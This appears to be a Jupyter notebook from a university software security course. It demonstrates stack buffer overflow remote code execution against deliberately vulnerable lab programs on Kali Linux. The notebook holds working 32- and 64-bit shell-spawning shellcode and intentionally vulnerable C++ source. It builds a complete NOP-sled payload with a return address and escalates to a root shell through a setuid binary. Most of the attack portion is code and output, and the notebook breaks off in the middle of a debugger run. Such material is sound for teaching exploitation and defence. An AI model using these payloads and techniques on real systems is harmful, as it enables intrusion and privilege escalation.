## Stack Overflow - Remote Code Execution

- instead of sending junk and executing the existing code, send your own code and execute it!
- for this technique to succeed, program's stack must be executable (not just read and write)
- let's define some terminologies

### Payload
- a buffer that contains code and data to exploit the vulnerability
- payload typically has the following structure:

```bash
| repeated nop sled | shellcode | repeated controlled return address |
```
- offset determines the length of the payload
- shellcode size is fixed depending on what the code is supposed to do
- usually room to play with the length of nop sled and controlled return address

### nop sled
- `\x90` - no operation instruction in assembly
- if the buffer is large enough, use good number of NOP as a bigger cushion/wider landing zone
- as the stack may shift a bit, it's harder to land exactly where the shellcode is
- NOP let's you slide right to your shellcode that spawns a shell/terminal
- you still need to pad the controlled buffer to make it long enough to overwrite the caller's return address
    
### shellcode
- shellcode is attacker's code that can do anything 
    - such as creating/deleting a log file, adding a new user, change filewall rule, etc.
- binary code that actually exploits the vulnerability
- most common shellcode typically spawns, local or remote, tcp connect, reverse connect shell/terminal
- let's you own the system by giving you access to the terminal
- Shellcodes database - [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
  
### repeated return address
- address pointing to some address of repeated nop sled  where it is stored in buffer variable
- this controlled return address should overwrite the caller's return address on stack


### Example program that spawns shell/terminal
- let's look at an example program that spawns shell/terminal on the system by calling system call
- `shellcode/system_shell.cpp` program uses system function defined in `<stdlib.h>` library to exectue `/bin/sh` command

In [42]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/stack_overflow


In [43]:
%cd ../shellcodes

/home/kali/projects/SoftwareSecurity/demos/shellcodes


In [44]:
! cat system_shell.cpp

#include <unistd.h>

int main() {
    char * name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}

In [45]:
! g++ -o shellcode.exe system_shell.cpp

system_shell.cpp: In function ‘int main()’:
system_shell.cpp:5:15: warning: ISO C++ forbids converting a string constant to ‘char*’ []8;;https://gcc.gnu.org/onlinedocs/gcc/Warning-Options.html#index-Wwrite-strings-Wwrite-strings]8;;]
    5 |     name[0] = "/bin/sh";
      |               ^~~~~~~~~


- run system_shell.exe from terminal
    - Jupyter notebook doesn't give shell/terminal

```
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ ./system_shell.exe               
$ whoami                                                                                                                  
kali
$ date                                                                                                                    
Mon Mar 27 14:44:01 EDT 2023
$ exit
```
    
- note that shellcode:
    - typically is NOT bash command string by itself - /bin/sh
    - is executable binary when executed gives shell/terminal
    - typically written in C/assembly and compiled/assembled as a binary
    - if stored in stack as a part of buffer, stack must be Executable!
        - so the buffer can be treated as executable code
    - can't just compile C code and create exploit code (lot more complicated)
        
        
## Remote code execution demos
- make stack executable
- use stack variable to store the remote shellcode
- find the location of the shellcode and execute it

### Use program argument to smuggle shellcode
- if the vulnerable program uses argument to get the data, provide shellcode instead of data!
- let's demonstrate it with `demos/stack_overflow/so_arg.cpp` program

### 32-bit Shellcode
- https://seedsecuritylabs.org/Labs_20.04/Files/Buffer_Overflow_Setuid/Buffer_Overflow_Setuid.pdf
- the following assembly essentially does the same as the C++ code above

```c++
; Store the command on stack
xor eax, eax
push eax
push "//sh"                      ; // makes sh 32-bit word instead of /sh with is 24-bit
push "/bin"
mov ebx, esp                     ; ebx --> "/bin//sh": execve()’s 1st argument

; Construct the argument array argv[]
push eax                         ; argv[1] = 0
push ebx                         ; argv[0] --> "/bin//sh"
mov ecx, esp                     ; ecx --> argv[]: execve()’s 2nd argument

; For environment variable
xor edx, edx                     ; edx = 0: execve()’s 3rd argument

; Invoke execve()
xor eax, eax
mov al, 0x0b                    ; execve()’s system call number
int 0x80                        ; interrupt to make system call
```

### 64-bit Shellcode

```cpp
xor rdx, rdx          ; rdx = 0: execve()’s 3rd argument
push rdx
mov rax, ’/bin//sh’   ; the command we want to run
push rax ;
mov rdi, rsp          ; rdi --> "/bin//sh": execve()’s 1st argument
push rdx              ; argv[1] = 0
push rdi              ; argv[0] --> "/bin//sh"
mov rsi, rsp          ; rsi --> argv[]: execve()’s 2nd argument
xor rax, rax
mov al, 0x3b          ; execve()’s system call number
syscall
```

### Shellcode in action

- we can create the binary version of shellcode above and use it in our exploit code
- exploit code can be written in any language such as, C/C++, Bash, Python, etc.
- as a quick demo, let's see `call_shellcode.cpp` file in `shellcode` folder to demo launching the binary shellcode
- use Makefile provided to build 32-bit and 64-bit executable and observe the exploit-code behavior when executing them
- compile without setuid and with setuid and observe the difference
- for setuid to be effective make sure to create a softlink /bin/sh pointing to /bin/zsh

```bash
sudo ln -sf /bin/zsh /bin/sh
```

In [11]:
! cat call_shellcode.cpp

#include <cstdlib>
#include <cstring>


const char shellcode[] =
#ifdef __x86_64__
    "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
    "\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
    "\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
#else
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
    "\xd2\x31\xc0\xb0\x0b\xcd\x80"
#endif
;

int main(int argc, char **argv)
{
    char code[500];
    strcpy(code, shellcode); // Copy the shellcode to the stack
    int (*func)() = (int(*)())code;
    func(); // Invoke the shellcode from the stack
    return 0;
}

In [12]:
! cat Makefile


.PHONY: all
all: 32bit 64bit

.PHONY: clean
clean:
	rm -f *.out

.PHONY: 32bit
32bit:
	g++ -m32 -z execstack -o callshell32.out call_shellcode.cpp
	@echo callshell32.out built successfully!

.PHONY: 64bit
64bit:
	g++ -z execstack -o callshell64.out call_shellcode.cpp
	@echo callshell64.out built successfully!

.PHONY: setuid
setuid: all
	sudo chown root:root callshell32.out callshell64.out
	sudo chmod u+s callshell32.out callshell64.out
	@echo setuid set for both 32-bit and 64-bit exectuables!


In [14]:
! echo kali | sudo -S make setuid

[sudo] password for kali: g++ -m32 -z execstack -o callshell32.out call_shellcode.cpp
callshell32.out built successfully!
g++ -z execstack -o callshell64.out call_shellcode.cpp
callshell64.out built successfully!
sudo chown root:root callshell32.out callshell64.out
sudo chmod u+s callshell32.out callshell64.out
setuid set for both 32-bit and 64-bit exectuables!


## Exploiting stack overflow via argument to main

- this has been demonstrated before using pwntools

In [15]:
!pwd

/home/kali/projects/SoftwareSecurity/demos/shellcodes


In [16]:
%cd ../stack_overflow

/home/kali/projects/SoftwareSecurity/demos/stack_overflow


In [17]:
# let's look at the source
# program simply copies and prints the user provided argument
! cat so_arg.cpp

#include <cstdio>
#include <cstring>
#include <iostream>

using namespace std;

#define BUFSIZE 128

void copydata(char *dst_buf, char *src_buf) {
    // similar to strcpy in cstdio
    size_t i = 0;
    // copy each character from src_buf to des_buffer
    // stop when NUL character is encountered
    while (*(src_buf+i) != 0) {
        *(dst_buf+i) = *(src_buf+i);
        i++;
    }
    *(dst_buf+i) = 0; // end with NUL character
}

void bad(char *data) {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    //strcpy(buffer, data);
    copydata(buffer, data);
    cout << "buffer contains: \n" << buffer << endl;
}

int main(int argc, char *argv[]) {
    bad(argv[1]);
    cout << "Good bye!" << endl;
    return 0;
}

In [20]:
%%bash
# let's compile and execute the program
input="so_arg.cpp"
output=so_arg.exe
echo kali | sudo -S ../compile.sh $input $output

[sudo] password for kali: so_arg.cpp: In function ‘int main(int, char**)’:
so_arg.cpp:29:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   29 | int main(int argc, char *argv[]) {
      |          ~~~~^~~~


### crash the program
- provide a large string and see how the program behaves
- if the program crashes, availability of the program is violated and is the telltale sign that the program is likeley vulnerabile to stackoverflow!

In [21]:
! ./so_arg.exe $(python3 -c 'print("A"*100)')
# note the buffer address!
# How do you know the program has crashed? 
# On terminal you'll see segfault!
# On Jupyter notebook it's not obvious...

buffer is at 0xffffbc20
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [8]:
# provide a longer argument and see if the program segfaults
! ./so_arg.exe $(python3 -c 'print("A"*128)')
# also note the buffer address

buffer is at 0xffffbca0
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Good bye!


In [10]:
# provide a longer argument and see if the program segfaults
! ./so_arg.exe $(python3 -c 'print("A"*200)')
# buffer size is 128; 124 A's crashes the program; notice no Good bye! printed
# also note the buffer address

buffer is at 0xffffbc50
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


- let's verify it on from the terminal that the program actually crashed

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ ./so_arg.exe $(python3 -c 'print("A"*140)')
buffer is at 0xffffc2d0
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./so_arg.exe $(python3 -c 'print("A"*140)')
```

### Remote code execution steps

1. find the offset to return address using gdb-peda
2. generate shellcode using tools (peda, pwntools) or find the right shellcode at [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
3. find the return address of buffer or nop sled
4. create payload and send it to the target program appropriately

### Use gdb-peda to find offset and address of buffer
- address of buffer is already printed - careful with the shifting address
- use the same fixed length JUNK/pattern to keep the address consistently the same while crashing the
- use gdb batch command file or manually step by stem command

### Use batch commands
- gdb allows batch file to automte a series of commands to be executed
- see `demos/stack_overflow/gdb-so-arg.txt` as a demo
- use batch command file with gdb-peda using the following command:

```bash
gdb -q -batch -x <gdb-batch-commands.txt> ./<target_program>
```

In [22]:
! cat gdb-so-arg.txt

break main
pattern arg 200
run
continue
patts
quit


In [23]:
! gdb -q -batch -x gdb-so-arg.txt ./so_arg.exe

Breakpoint 1 at 0x8049279: file so_arg.cpp, line 30.
Set 1 arguments to program
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Use 'set logging enabled off'.

Use 'set logging enabled on'.

[----------------------------------registers-----------------------------------]
EAX: 0xffffbbf0 --> 0x2 
EBX: 0x804bff4 --> 0x804bef8 --> 0x1 
ECX: 0xffffbbf0 --> 0x2 
EDX: 0xffffbc10 --> 0xf7a35e14 --> 0x235d0c ('\x0c]#')
ESI: 0xffffbcb0 --> 0xffffc081 ("COLORFGBG=15;0")
EDI: 0xf7ffcb60 --> 0x0 
EBP: 0xffffbbd8 --> 0x0 
ESP: 0xffffbbd0 --> 0xffffbbf0 --> 0x2 
EIP: 0x8049279 (<main(int, char**)+28>:	mov    eax,DWORD PTR [eax+0x4])
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804926c <main(int, char**)+15>:	call   0x80490c0 <__x86.get_pc_thunk.bx>
   0x8049271 <main(int, char**)+20>:	add    ebx,0x2d83
   0x8

#### Use gdb-peda manually

- find the offset using gdb-peda
- we'll find the offset that overwrites the caller's return address

```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/stack_overflow]
└─$ gdb -q so_arg.exe      
Reading symbols from so_arg.exe...
```

- create cyclic pattern (long enough) 200 bytes as an argument and use it to run the program

```bash
gdb-peda$ pattern arg 200
Set 1 arguments to program

gdb-peda$ run

Starting program: /home/kali/EthicalHacking/so_arg.exe 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
buffer is at 0xffffc250
buffer contains: 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>:     push   ebx)
EBX: 0x6c414150 ('PAAl')
ECX: 0x6c0 
EDX: 0x8051bb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
ESI: 0xf7de6000 --> 0x1e4d6c 
EDI: 0xf7de6000 --> 0x1e4d6c 
EBP: 0x41514141 ('AAQA')
ESP: 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41416d41 ('AmAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41416d41
[------------------------------------stack-------------------------------------]
0000| 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0004| 0xffffc2e4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0008| 0xffffc2e8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0012| 0xffffc2ec ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0016| 0xffffc2f0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0020| 0xffffc2f4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0024| 0xffffc2f8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
0028| 0xffffc2fc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41416d41 in ?? ()
```

```bash

gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140 <---- !!!THIS IS THE OFFSET!!!
Registers point to pattern buffer:
[EDX] --> offset 0 - size ~203
[ESP] --> offset 144 - size ~56 
Pattern buffer found at:
0x08051bb0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc250 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
0xffffc625 : offset    0 - size  200 ($sp + 0x345 [209 dwords])
References to pattern buffer found at:
0xf7de6d24 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d28 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d2c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d30 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d34 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d38 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xf7de6d3c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
0xffffbbc4 : 0x08051bb0 ($sp + -0x71c [-455 dwords])
0xffffbbe8 : 0x08051bb0 ($sp + -0x6f8 [-446 dwords])
0xffffbc14 : 0x08051bb0 ($sp + -0x6cc [-435 dwords])
0xffffbc30 : 0x08051bb0 ($sp + -0x6b0 [-428 dwords])
0xffffbc34 : 0x08051bb0 ($sp + -0x6ac [-427 dwords])
0xffffbc44 : 0x08051bb0 ($sp + -0x69c [-423 dwords])
0xffffbc94 : 0x08051bb0 ($sp + -0x64c [-403 dwords])
0xffffc0d8 : 0x08051bb0 ($sp + -0x208 [-130 dwords])
0xffffc124 : 0x08051bb0 ($sp + -0x1bc [-111 dwords])
0xf7e62dcc : 0xffffc250 (/usr/lib32/libstdc++.so.6.0.28)
0xffffbd40 : 0xffffc250 ($sp + -0x5a0 [-360 dwords])
0xf7e650b7 : 0xffffc625 (/usr/lib32/libstdc++.so.6.0.28)
0xffffc3b8 : 0xffffc625 ($sp + 0xd8 [54 dwords])

```

- buffer address is conviniently printed everytime program is executed

```bash

┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/stack_overflow]
└─$ ./so_arg.exe $(python3 -c 'print("A"*10)')                                                                 139 ⨯
buffer is at 0xffffc360   <--------- buffer address; will this shift as the argument length changes?
buffer contains: 
AAAAAAAAAA
Good bye!
```

### need shellcode

- next we need a **shellcode**
- a bunch of binary shellcode files are already provided in `shellcode` folder

In [32]:
! ls -l ../shellcodes

total 80
-rwsr-xr-x 1 root root 14992 Mar 31 14:41 callshell32.out
-rwsr-xr-x 1 root root 15880 Mar 31 14:41 callshell64.out
-rw-r--r-- 1 kali kali   589 Mar 31 14:20 call_shellcode.cpp
-rw-r--r-- 1 kali kali   500 Mar 31 14:20 Makefile
-rw-r--r-- 1 kali kali    24 Mar 31 14:20 shellcode.bin
-rwxr-xr-x 1 kali kali 15960 Mar 31 14:36 shellcode.exe
-rw-r--r-- 1 kali kali    35 Mar 31 14:20 shellcode_root.bin
-rw-r--r-- 1 kali kali   978 Mar 31 14:20 shellcode_writer.py
-rw-r--r-- 1 kali kali   153 Mar 31 14:20 system_shell1.cpp
-rw-r--r-- 1 kali kali   147 Mar 31 14:20 system_shell.cpp
-rw-r--r-- 1 kali kali   364 Mar 31 14:20 x86-linux-sh.py


### generate shellcode with GDB-PEDA

- PEDA provides several shellcodes to pick from
- the following command generates linux/x86 local shellcode


```bash
┌──(kali㉿kali)-[~/projects/SoftwareSecurity/demos/stack_overflow]
└─$ gdb -q
gdb-peda$ shellcode generate
Available shellcodes:
    x86/linux exec
    x86/linux bindport
    x86/linux connect
    x86/bsd exec
    x86/bsd bindport
    x86/bsd connect

gdb-peda$ shellcode generate x86/linux exec
# x86/linux/exec: 24 bytes
shellcode = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
    "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

```
- your can write the generated shellcode to a file for easy access
- copy line by line hex values between " " and append it to a binary file
- you can bash echo, or python3
- the followin code demonstrates writing shellcode to a file using echo command

In [22]:
# -n : do not print the trailing newline
# -e : enable intrepretation of blackslash
! echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68" > shellcode_bash.bin
! echo -ne "\x68\x2f\x62\x69\x6e\x89\xe3\x31" >> shellcode_bash.bin
! echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> shellcode_bash.bin

In [23]:
! wc -c shellcode_bash.bin

24 shellcode_bash.bin


In [24]:
! hexdump -C shellcode_bash.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


- the following Pyton3 script to write the shellcode to a binary file

In [25]:
# Python3 script
with open('shellcode_py3.bin', 'wb') as fout:
    fout.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31")
    fout.write(b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80")

In [26]:
! wc -c shellcode_py3.bin

24 shellcode_py3.bin


In [27]:
! hexdump -C shellcode_py3.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


- the following command shows using Python3 from terminal to write the shellcode to a binary file

In [28]:
# Python3 from terminal
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")' > shellcode1_py3.bin

In [29]:
! wc -c shellcode1_py3.bin

24 shellcode1_py3.bin


In [30]:
! hexdump -C shellcode1_py3.bin

00000000  31 c0 50 68 2f 2f 73 68  68 2f 62 69 6e 89 e3 31  |1.Ph//shh/bin..1|
00000010  c9 89 ca 6a 0b 58 cd 80                           |...j.X..|
00000018


### create payload

- recall payload has the following structure
```
| NOP sled | shellcode | controlled return address |
```

- we found out that **144** is the total length of the payload as **140** is the offset
- user shellcode (see above) is **24** bytes long
- total bytes remaining for NOP sled and repeated return address can be calculated as following

In [31]:
print(144-24)

120


- out of **120** bytes, return address size is 4 in 32-bit system
- let's repeat the return address *5 times*
- so the size of repeated return address = **5\*4 = 20**
- that leaves us with **120 - 20 = 100 NOP sled**
- **make sure length of (NOP sled + Shellcode) is a multiple of 4!**
    - so the one of the 4-byte repeated return addresses perfectly aligns at the (EBP+4) location

- so, we'll create the payload file of the following structure

```
| 100 NOP sled | 24 bytes shellcode | 5 controlled return addresses |
```

In [45]:
# let's create NOP sled of 100 bytes long and write it to payload.bin file
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*100)' > payload.bin

In [46]:
# let's append shellcode_py3.bin to payload.bin file
! cat shellcode_py3.bin >> payload.bin

In [47]:
! wc -c payload.bin

124 payload.bin


In [48]:
! hexdump -C payload.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000060  90 90 90 90 31 c0 50 68  2f 2f 73 68 68 2f 62 69  |....1.Ph//shh/bi|
00000070  6e 89 e3 31 c9 89 ca 6a  0b 58 cd 80              |n..1...j.X..|
0000007c


- what's the address of buffer?
- make sure we use the same size of junk as the size of the payload
- this should be run directly from terminal as the buffer will shift if the program is run from the notebook

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ ./so_arg.exe $(python3 -c 'print("A"*144, end="")')
buffer is at 0xffffbd70  <<<<<<-----NOTE THE ADDRESS -----!!!!
buffer contains: 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./so_arg.exe $(python3 -c 'print("A"*144, end="")')

```

- you can try landing at the base address of buffer or some bytes away from it, just in case!

In [49]:
# it's recommended to pick SOME bytes away from the base address of the buffer 
# if possible and necessary
! printf "%x" $((0xffffBD70+20))

ffffbd84

In [50]:
# but, let's just use the buffer's base address to start with...
# we repeat the return address 5 times
! python -c 'import sys; sys.stdout.buffer.write(b"\x84\xbd\xff\xff"*5)' >> payload.bin

In [51]:
# out payload is ready; let's check size make sure it's the same as the offset
! wc -c payload.bin

144 payload.bin


In [52]:
# let's see the content using hexdump
! hexdump -C payload.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000060  90 90 90 90 31 c0 50 68  2f 2f 73 68 68 2f 62 69  |....1.Ph//shh/bi|
00000070  6e 89 e3 31 c9 89 ca 6a  0b 58 cd 80 84 bd ff ff  |n..1...j.X......|
00000080  84 bd ff ff 84 bd ff ff  84 bd ff ff 84 bd ff ff  |................|
00000090


#### finally, run the target program with the payload 

```bash
base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ ./so_arg.exe $(cat payload.bin)
buffer is at 0xffffbd70
buffer contains: 
����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
                             X��������������������
(base) kali@x86_64-conda-linux-gnu:~/projects/SoftwareSecurity$ whoami              
kali
                                                                                         
(base) kali@x86_64-conda-linux-gnu:~/projects/SoftwareSecurity$ date
Wed Mar 29 10:42:06 EDT 2023

```

### What about root shell?
- create softlink `/bin/sh` pointing to `/bin/zsh`
- make the program set-uid root and exploit it using the same payload

In [53]:
! echo kali | sudo -S ln -sf /bin/zsh /bin/sh

[sudo] password for kali: 

In [54]:
! ls -al /bin/sh

lrwxrwxrwx 1 root root 8 Mar 29 10:46 /bin/sh -> /bin/zsh


In [56]:
! echo kali | sudo -S chown root:root so_arg.exe

[sudo] password for kali: 

In [57]:
! echo kali | sudo -S chmod u+s so_arg.exe

[sudo] password for kali: 

In [58]:
! ls -al so_arg.exe

-rwsr-xr-x 1 root root 32808 Mar 29 10:23 so_arg.exe


#### Exploit the program
- launch the same payload created before as nothing else has changed

```bash
(base) ┌──(kali㉿kali)-[~/projects/SoftwareSecurity]
└─$ ./so_arg.exe $(cat payload.bin)
buffer is at 0xffffbd70
buffer contains: 
����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
                       X��������������������
kali# whoami                                                                                   
root
kali# date                                                                                     
Wed Mar 29 10:49:28 EDT 2023
kali# exit
```

## Use standard input to smuggle the shellcode

- if the program takes data from standard input and the buffer overrun is possible, then shellcode can still be transmitted and the program exploited
- the steps are slightly different from sending shellcode as an argument
- let's work with `so_stdio.cpp` program to demonstrate the steps

In [24]:
! cat so_stdio.cpp

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <iostream>
using namespace std;

#define BUFSIZE 128

using namespace std;

void give_shell(){
    system("/bin/sh");
}

char * mgets(char *dst) {
    char *ptr = dst;
    int ch; 
	/* skip leading white spaces */ 
    while ((ch = getchar()) && (ch == ' ' or ch == '\t') )
        ; 

    if ((ch == '\n') or (ch == EOF)) { 
        *ptr = '\0';
        return dst; 
    } 
    else
        *ptr = ch;

    /* now read the rest until \n or EOF */ 
    while (true) {
        ch = getchar();
        if (ch == '\n' or ch == EOF) break;
        *(++ptr) = ch; 
    }
    *(++ptr) = 0;
    return dst;
}

void bad() {
    char buffer[BUFSIZE];
    printf("buffer is at %p\n", buffer);
    cout << "Give me some text: ";
    fflush(stdout);
    mgets(buffer); // similar to C's gets;
    //gets(buffer); // depricated
    cout << "Acknowledged: " << buffer << " with length " << strlen(buffer

In [33]:
%%bash
input=so_stdio.cpp
output=so_stdio.exe

echo kali | sudo -S ../compile.sh $input $output

[sudo] password for kali: so_stdio.cpp: In function ‘char* mgets(char*)’:
so_stdio.cpp:29:16: warning: conversion from ‘int’ to ‘char’ may change value [-Wconversion]
   29 |         *ptr = ch;
      |                ^~
so_stdio.cpp:35:20: warning: conversion from ‘int’ to ‘char’ may change value [-Wconversion]
   35 |         *(++ptr) = ch;
      |                    ^~
so_stdio.cpp: In function ‘int main(int, char**)’:
so_stdio.cpp:51:14: warning: unused parameter ‘argc’ [-Wunused-parameter]
   51 | int main(int argc, char *argv[]) {
      |          ~~~~^~~~
so_stdio.cpp:51:26: warning: unused parameter ‘argv’ [-Wunused-parameter]
   51 | int main(int argc, char *argv[]) {
      |                    ~~~~~~^~~~~~


- since the stack_overflow_stdio.exe program reads the data from standard input, it can be piped to the program

In [23]:
! python -c 'print("Hello World")' | ./so_stdio.exe

buffer is at 0xffffc1e0
Give me some text: Acknowledged: Hello World with length 11
Good bye!


### Crash the program

- quick way to tell if the program has buffer overrun vulnerability, is to send a long string and see how the program reacts
- if the program segfaults, it's a telltail sign that the program has buffer overflow flaw

In [24]:
! python -c 'print("A"*100)' | ./so_stdio.exe

buffer is at 0xffffc1e0
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA with length 100
Good bye!


- because the size of the buffer is 128 and the data we sent was 100, this was okay as expected

In [25]:
# try longer string
! python -c 'print("A"*200)' | ./so_stdio.exe
# since Good bye! is not printed; system must have crashed!

buffer is at 0xffffc1e0
Give me some text: Acknowledged: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA with length 200


#### Using GDB-batch commands

In [27]:
! cat gdb-so-stdio.txt

pattern create 200 pattern.txt
run < pattern.txt
patts


In [59]:
! gdb -q -batch -x gdb-so-stdio.txt ./so_stdio.exe

Writing pattern of 200 chars to filename "pattern.txt"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
buffer is at 0xffffbcc0
